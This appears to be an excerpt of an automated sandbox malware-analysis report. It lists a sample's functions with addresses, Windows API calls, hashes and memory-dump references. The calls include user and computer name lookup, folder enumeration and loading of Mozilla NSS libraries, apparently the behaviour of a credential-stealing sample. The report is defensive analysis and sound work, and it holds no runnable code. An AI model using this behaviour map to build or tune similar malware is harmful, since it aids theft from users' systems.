Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 0a8fc0307db0310350536449495d5848ed60b85d7a568e231083c23e98868d9c
Instruction ID: 4b138641442dd51730d9762ac92e0d5652ebadbf156882a2c3fe3545aa946475
Opcode Fuzzy Hash: 0a8fc0307db0310350536449495d5848ed60b85d7a568e231083c23e98868d9c
Instruction Fuzzy Hash: 98915572911108ABCF14FBA1DC96EEE7339AF54314F40416EF40772191EF786A98CB6A

Function 0040B0B0 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

lstrlenA.KERNEL32(00000000), ref: 0040B2AE
lstrlenA.KERNEL32(00000000), ref: 0040B2C2

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: dde2cbadb8c87ec9c8d9956c53a7a91001ec0db1198f456c11b792f8078cad0d
Instruction ID: d2f8e92f06f21ad00195b851541a0fca05b03a5e78dc2554d63ff73f5d8ac6c5
Opcode Fuzzy Hash: dde2cbadb8c87ec9c8d9956c53a7a91001ec0db1198f456c11b792f8078cad0d
Instruction Fuzzy Hash: A9717371911108ABCF14FBA1DC56EEE7339BF54314F40412EF403A2191EF786A58CBAA

Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: badb7cecddd27d9e1aa55144c1fc7f4ba9690274eb5e83060997e099dbd08bd4
Instruction ID: 4499aa19cc86b02a1bac446f32e864e245a0bde13e44bf0a480e22725e368a89
Opcode Fuzzy Hash: badb7cecddd27d9e1aa55144c1fc7f4ba9690274eb5e83060997e099dbd08bd4
Instruction Fuzzy Hash: 2B41F334A00208EFCB44CF58C494BADBBB1FF44314F1486A9E94AAB385C735EA91CF84

Function 00414B30 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414B6A
lstrcat.KERNEL32(?,026D9028), ref: 00414B88

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: ea26987b4423f50a717eb4a0c73cf79a460df56b31a43226088b2649255c0623
Instruction ID: 3c3433cccd63aeccdbe2a936e698fd88f8205579aacfd307105c0296dbc1629e
Opcode Fuzzy Hash: ea26987b4423f50a717eb4a0c73cf79a460df56b31a43226088b2649255c0623
Instruction Fuzzy Hash: 8B01967690021C67CB24FB60DC46EDE733C9B64304F40415EBA4A57191FEB8AAC98BE5

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,004164BC), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64

Function 00418830 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040FF57,?,00000000,?,00000000,00420D97,00420D96), ref: 0041883F

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2bde64b4f7e7231a3517be2c96d67b638509f2a4ea4281addbaafb0f515e4d7c
Instruction ID: 05b335d21f22619e77aa966aeb7f376ddd46b9d978e537c949d5f100d696e3dd
Opcode Fuzzy Hash: 2bde64b4f7e7231a3517be2c96d67b638509f2a4ea4281addbaafb0f515e4d7c
Instruction Fuzzy Hash: 70F01570C0020CEFCB04EFA5C9496DDBB75EB00324F50859EE82AA7281DBB85B95CB85

Function 00418880 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 51571f28d6a7ed4813964dc8c522bdbe61ee22cda778a467bc1242f5a69e0a37
Instruction ID: 7b71b80bc5ec6c4d76f30a423bf4d75a71df8f4b6dd8708b5fa25dfbbe6c75fa
Opcode Fuzzy Hash: 51571f28d6a7ed4813964dc8c522bdbe61ee22cda778a467bc1242f5a69e0a37
Instruction Fuzzy Hash: 7AE01A31A4034C7BDB55EBA0CC96FEE736CAB44B15F004299BA0C5B1C0EE74AB858B91

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
Instruction ID: 84cbab3e625f5c703ca2aee7bdcd0b4d96e9050e400d57d2133d1b743e823249
Opcode Fuzzy Hash: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
Instruction Fuzzy Hash: 8EE0C27190070222DB2033B66C06B6B329D0B1435DF00052EFA08D7252FE3CF81182AC

Function 0041A270 Relevance: 1.3, APIs: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: c2fc4e1fd4be9ef044dbc11c0819e19b14df2fb30b2739993815bf0de72bef61
Instruction ID: 2a78e701e35aec36e6769ce11f212970ab7c3b82bc423fc04febfee158968705
Opcode Fuzzy Hash: c2fc4e1fd4be9ef044dbc11c0819e19b14df2fb30b2739993815bf0de72bef61
Instruction Fuzzy Hash: 08112D74A00208EFC705CF94D590A9AB3B2FF89304F2080E8E8095B391C736AE51DB54

Function 004188D0 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 69e24b86b28bd7b079a6e9cca7457a077172f38b64f4847235a515cc131b290b
Instruction ID: 18df4f3d1847af864b4cf5612dd8d404a1e3ff34582bf4e0d6244d1823b45961
Opcode Fuzzy Hash: 69e24b86b28bd7b079a6e9cca7457a077172f38b64f4847235a515cc131b290b
Instruction Fuzzy Hash: B301FBB491420CEBCB14CF98D585BEC7BB5EF04308F248089D9456B350C7785F84DB4A

Function 004098D0 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 004098D8

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 1aee106081fe82a84b5a838b5431766f4324473991f19cdffcfc85f73d7ea574
Instruction ID: 85591d8b2077324c158e0d5cdc0cd752fc6e9f2d8541dbcaab8872a49f7b11e9
Opcode Fuzzy Hash: 1aee106081fe82a84b5a838b5431766f4324473991f19cdffcfc85f73d7ea574
Instruction Fuzzy Hash: CFF054B4D00208FBDB00EFA5C946B9EB7B4AB08304F1085A9FD05A7381E6749B00CB95

Non-executed Functions

Function 6C806E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C952120,6C807E60), ref: 6C806EBC
TlsGetValue.KERNEL32 ref: 6C806EDF
EnterCriticalSection.KERNEL32(?), ref: 6C806EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C806F25

Part of subcall function 6C7DA900: TlsGetValue.KERNEL32(00000000,?,6C9514E4,?,6C774DD9), ref: 6C7DA90F
Part of subcall function 6C7DA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C7DA94F

PR_Unlock.NSS3 ref: 6C806F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C806FA9
TlsGetValue.KERNEL32 ref: 6C8070B4
EnterCriticalSection.KERNEL32(?), ref: 6C8070C8
PR_CallOnce.NSS3(6C9524C0,6C847590), ref: 6C807104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C807117
SECOID_Init.NSS3 ref: 6C807128
PORT_Alloc_Util.NSS3(00000057), ref: 6C80714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C80717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8071A9
PR_NotifyAllCondVar.NSS3 ref: 6C8071CF
PR_Unlock.NSS3 ref: 6C8071DD
free.MOZGLUE(?), ref: 6C8071EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C807208
free.MOZGLUE(00000000), ref: 6C807221
free.MOZGLUE(00000001), ref: 6C807235
TlsGetValue.KERNEL32 ref: 6C80724A
EnterCriticalSection.KERNEL32(?), ref: 6C80725E
PR_NotifyCondVar.NSS3 ref: 6C807273
PR_Unlock.NSS3 ref: 6C807281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C807291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8072B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8072D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8072E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C807301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C807310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C807335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C807344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C807363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C807372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C940148,,defaultModDB,internalKeySlot), ref: 6C8074CC
free.MOZGLUE(00000000), ref: 6C807513
free.MOZGLUE(00000000), ref: 6C80751B
free.MOZGLUE(00000000), ref: 6C807528
free.MOZGLUE(00000000), ref: 6C80753C
free.MOZGLUE(00000000), ref: 6C807550
free.MOZGLUE(00000000), ref: 6C807561
free.MOZGLUE(00000000), ref: 6C807572
free.MOZGLUE(00000000), ref: 6C807583
free.MOZGLUE(00000000), ref: 6C807594
free.MOZGLUE(00000000), ref: 6C8075A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C8075BD
free.MOZGLUE(00000000), ref: 6C8075C8
free.MOZGLUE(00000000), ref: 6C8075F1
